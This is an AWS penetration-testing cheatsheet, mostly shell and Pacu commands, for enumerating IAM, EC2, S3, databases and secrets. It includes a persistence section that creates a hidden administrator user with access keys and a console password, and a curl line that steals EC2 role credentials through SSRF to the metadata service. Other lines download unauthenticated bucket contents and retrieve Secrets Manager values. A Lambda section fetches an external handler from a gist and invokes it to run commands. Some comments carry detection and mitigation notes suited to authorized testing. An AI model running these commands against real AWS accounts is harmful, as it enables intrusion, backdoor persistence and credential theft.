Installation and Basic Commands
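# Install AWS CLI v2 (Linux x86_64). AWS publishes a signature for this zip;
# verify it before running the installer with sudo.
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install
# Login - interactive prompt for the access key ID and secret access key
# (plus default region and output format). The values are written in plaintext
# to ~/.aws/credentials (see "Saved Credential Location" further down).
aws configure
# Login - create a named profile when you work with several accounts
aws configure --profile Some_NAME
# Get info about the key in use: account ID, caller ARN and user ID
aws sts get-caller-identity --profile Some_NAME
# Using short-term temporary credentials (STS): all three values are required;
# the session token is what distinguishes them from long-term keys
aws configure set aws_access_key_id [access-key-id] --profile ec2
aws configure set aws_secret_access_key [secret-access-key] --profile ec2
aws configure set aws_session_token [session-token] --profile ec2
aws sts get-caller-identity --profile ec2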
Exploitation using PACU
#Download and install Pacu (AWS exploitation framework, Python package)
pip3 install -U pacu
#Run pacu and create a session: "0" answers the "new session" prompt,
#the next line is the session name it asks for
pacu
0
AWS-Pentest
#Create an AWS login session inside Pacu - you are prompted for the access key and secret key
set_keys
#Enumerate the IAM permissions of the current keys; this populates what whoami reports
exec iam__enum_permissions
#List all permissions gathered for the logged-in user
whoami
#Enumerate EC2 instances
exec ec2__enum
#List all the EC2 data gathered in this session
data EC2
#Auto PrivEsc - scans the gathered permissions for IAM privilege-escalation paths
exec iam__privesc_scan
Saved Credential Location
#Windows - filename: credentials  C:\Users\Name\.aws\credentials
#Linux - filename: credentials  /home/username/.aws/credentials
#Both files hold the keys in plaintext; restrict their file permissions.
Important Things to Note
- If the access key ID starts with AKIA, it's a long-term credential (temporary STS keys start with ASIA)
- If an account number is present in a policy (e.g. in its ARN), it's an inline or customer-created policy, not an AWS-managed one
Enumeration - Users
#List users in the account
aws iam list-users
#Check if a given user is part of any groups (the groups' policies also apply to the user)
aws iam list-groups-for-user --user-name UserNameHere
#List managed policies (AWS-managed or customer-managed) attached directly to a user
aws iam list-attached-user-policies --user-name UserNameHere
#List inline policies embedded directly in the user (names only; get-user-policy returns the document)
aws iam list-user-policies --user-name UserNameHere
Enumeration - Groups & Policies
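#List all groups
aws iam list-groups
#List all users in a given group (the group's ARN/ID is returned as well)
aws iam get-group --group-name GroupNameHere
#List all managed policies that are attached to the specified IAM user
aws iam list-attached-user-policies --user-name [user-name]
#List the names of the inline policies embedded in the specified IAM user
aws iam list-user-policies --user-name [user-name]
#List all IAM roles - roles are assumed (by services, users or federated identities)
#rather than attached; each role's trust policy in the output says who may assume it
aws iam list-roles
#List all managed policies that are attached to the specified IAM role
aws iam list-attached-role-policies --role-name [role-name]
#List the names of the inline policies embedded in the specified IAM role
aws iam list-role-policies --role-name [role-name]
#List all managed policies - both AWS-managed and customer-managed
#(inline policies are not included; --scope Local limits the output to customer-managed ones)
aws iam list-policies
#List managed policies attached to a group
aws iam list-attached-group-policies --group-name <group-name>
#Retrieve information about the specified managed policy
#AttachmentCount = number of entities (users/groups/roles) this policy is attached to
#DefaultVersionId = the version currently in effect
aws iam get-policy --policy-arn [policy-arn]
#List information about the versions of the specified managed policy
aws iam list-policy-versions --policy-arn [policy-arn]
#Retrieve the specified version of the specified managed policy (this is the actual policy document)
aws iam get-policy-version --policy-arn [policy-arn] --version-id [version-id]
#Retrieve the specified inline policy document embedded in the specified IAM user / group / role
aws iam get-user-policy --user-name [username] --policy-name [policy-name]
aws iam get-group-policy --group-name [group-name] --policy-name [policy-name]
aws iam get-role-policy --role-name [role-name] --policy-name [policy-name]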
Simple Cheatsheet
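#List your identity - get the caller ARN (needed as --policy-source-arn below)
aws sts get-caller-identity
#To discover what else you can do, the IAM Policy Simulator is your best tool:
#it evaluates the principal's policies without executing the actions
#(the simulate call itself is an IAM API call and appears in CloudTrail)
aws iam simulate-principal-policy \
  --policy-source-arn <arn-of-user> \
  --action-names "ec2:DescribeInstances" "ec2:DescribeSubnets" "ec2:DescribeSecurityGroups"
#Check if you have any IAM permissions assigned to you
aws iam simulate-principal-policy \
  --policy-source-arn <arn-of-user> \
  --action-names "iam:ListUsers" "iam:ListRoles" "iam:GetPolicy"
#List user policies (inline policy names)
aws iam list-user-policies --user-name <user-name>
#Check for inline policies - fetch the document by the name returned above
aws iam get-user-policy --user-name <user-name> --policy-name <policy-name-from-previous-command>
#Check for group membership
aws iam list-groups-for-user --user-name <user-name>
#List the group's attached policies:
aws iam list-attached-group-policies --group-name <group-name>
#List the group's inline policies:
aws iam list-group-policies --group-name <group-name>
#Check for resource-based policies (e.g. a bucket policy grants access independently of identity policies)
aws s3api get-bucket-policy --bucket <the-bucket-name-you-can-access>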
Persistence
# Create the new user
aws iam create-user --user-name <new-hidden-user>
# Attach the same AdministratorAccess policy (an AWS-managed policy, hence "aws" in place of an account ID)
aws iam attach-user-policy --user-name <new-hidden-user> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# Create a new access key for your hidden user. Save this output securely.
# The secret access key is returned once only and cannot be retrieved again
aws iam create-access-key --user-name <new-hidden-user>
#AWS Console Access - creates a console password; --password-reset-required forces a change at first login
# Detection note: CreateUser, AttachUserPolicy, CreateAccessKey and CreateLoginProfile are all
# recorded in CloudTrail, and AttachUserPolicy with AdministratorAccess is a typical alert condition
aws iam create-login-profile --user-name <user-name> --password "YourSuperSecureP@ssw0rd!" --password-reset-required
Enumeration - Instances & Other Services
#List all EC2 instances in the default region (pass --region for others)
#Output includes the key pair name, public/private IPs, security groups and
#the IamInstanceProfile (the role the instance can use)
#Try to access the Public Endpoints - try to exploit them
#Check roles
aws ec2 describe-instances
#list only required details
aws ec2 describe-instances \
--filters "Name=instance-state-name,Values=running,stopped" \
--query "Reservations[*].Instances[*].{Name: (Tags[?Key=='Name'].Value | [0]), Hostname: PrivateDnsName, Status: State.Name, PrivateIP: PrivateIpAddress, PublicIP: PublicIpAddress}" \
--output table
#Example - retrieve EC2 temp creds if a server is public and is vuln to SSRF
#This plain GET only works against IMDSv1; IMDSv2 requires a session token obtained via PUT,
#so enforcing IMDSv2 (HttpTokens=required) on the instance is the mitigation
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/jump-ec2-role
S3 Bucket
#OSINT Enum - Find S3 Buckets
cloud_enum -k Bucket_Company_Name
#list all buckets
aws s3 ls
#Download Unauthenticated S3 Bucket files
aws s3 ls s3://<bucket-name> --region us-east-2 --no-sign-request
aws s3 cp s3://<bucket-name> --region us-east-2 --no-sign-request
#List S3 Bucket Contents
aws s3 ls s3://Bucket_name
#Download a file from s3 bucket
aws s3 cp s3://Bucket_name/file/path /path/to/save/fil
#List the items in a given bucket excluding mp4 files
aws s3 ls s3://bucketname/ --recursive --summarize --exclude "*.mp4"
#Exclude a directory and list
aws s3 ls s3://bucketname/ --recursive --summarize \
--exclude "archived-logs/*" \
--exclude "temp-uploads/*" \
--exclude "user-avatars/*"
#Download a bucket recursively excluding a directory
aws s3 cp s3://bucketname/ . --recursive --exclude "archived-logs/*"
#Upload a file to s3 Bucket
aws s3 cp /path/to/upload/filename s3://Bucket_name/file/path
#Delte a file on S3 Bucket
aws s3 rm s3://Bucket_name/file/path
Cloudwatch
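#Get S3 bucket size via CloudWatch - needs only cloudwatch:GetMetricStatistics,
#no S3 permission on the bucket itself (a metadata leak worth knowing about)
#S3 storage metrics are published once a day, hence the 86400-second period and the 2-day window
#date -d is GNU-specific; on macOS/BSD use: date -u -v-2d +'%Y-%m-%dT%H:%M:%SZ'
aws cloudwatch get-metric-statistics \
  --namespace AWS/S3 \
  --metric-name BucketSizeBytes \
  --dimensions Name=BucketName,Value=BucketNameHERE Name=StorageType,Value=StandardStorage \
  --start-time "$(date -u -d '2 days ago' +'%Y-%m-%dT%H:%M:%SZ')" \
  --end-time "$(date -u +'%Y-%m-%dT%H:%M:%SZ')" \
  --period 86400 \
  --statistics Average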
Database Enumeration
#RDS - endpoints, engine, PubliclyAccessible flag and master username (never the password)
aws rds describe-db-instances
#DynamoDB - table names in the current region
aws dynamodb list-tables
#Redshift clusters - endpoint and master username
aws redshift describe-clusters
#DocumentDB clusters - DocumentDB is exposed through the RDS API, hence the engine filter
aws rds describe-db-clusters --filter Name=engine,Values=docdb
Secrets Manager & KMS
#List secrets (names, ARNs and tags - not the values)
aws secretsmanager list-secrets
#Retrieve the value of a specific secret (needs secretsmanager:GetSecretValue; the call is logged in CloudTrail)
aws secretsmanager get-secret-value --secret-id <secret-name-or-arn>
#List KMS keys (IDs/ARNs only)
aws kms list-keys
#Describe a given key - state, usage and KeyManager (AWS vs CUSTOMER managed); aliases take the form alias/<name>
aws kms describe-key --key-id <key-id-or-alias-name>
#Check the key policy - "default" is the only policy name a key can have; look for wildcard principals
aws kms get-key-policy --key-id <key-id> --policy-name default
Exploit if the User has Lambda Read/Write/Invoke Permissions
Action:
- 'Lambda:CreateFunction'
- 'Lambda:InvokeFunction'
#List existing functions
aws lambda list-functions
#Get an existing function (returns the code location and the role the function runs as)
aws lambda get-function --function-name <Func_Name>
#Fetch the example handler, saved as lambda_function.py - read it before packaging,
#it will run with whatever role is passed below
wget https://gist.githubusercontent.com/Bhanunamikaze/bf121677e9ffa3b1d8bd09e90426a283/raw/b11d4942dac11ef6d00374f4b2acd2ebeafc0355/lambda_function.py
#Zip the file
zip function.zip lambda_function.py
#NOTE(review): list-groups-for-user returns group names, not role names. The role passed to
#--role below comes from `aws iam list-roles` (roles section above) and its trust policy must
#allow lambda.amazonaws.com to assume it
aws iam list-groups-for-user --user-name UserNameHere
#Create a Lambda function
#add --endpoint-url 'http://domain.local' if required
#Creating a function with --role also requires iam:PassRole on that role; resource-scoped PassRole
#(with the iam:PassedToService condition) is the control that blocks this path.
#The account ID and role name below are placeholders. python3.8 is past Lambda end-of-support,
#so the call may be rejected unless a currently supported runtime is used
aws lambda create-function --function-name test3 \
  --runtime python3.8 \
  --role arn:aws:iam::000000000000:role/<RoleNameHere> \
  --handler lambda_function.lambda_handler \
  --zip-file fileb://function.zip
#Create a payload file - payload.json; the next line is the file's JSON content, not a shell command
{"cmd": "ls"}
#Invoke the function. CreateFunction is a CloudTrail management event; Invoke is a data event
#and is only captured when Lambda data-event logging is enabled
aws lambda invoke --function-name test3 --payload fileb://payload.json output.json && cat output.json
#Output of the command execution is stored in output.json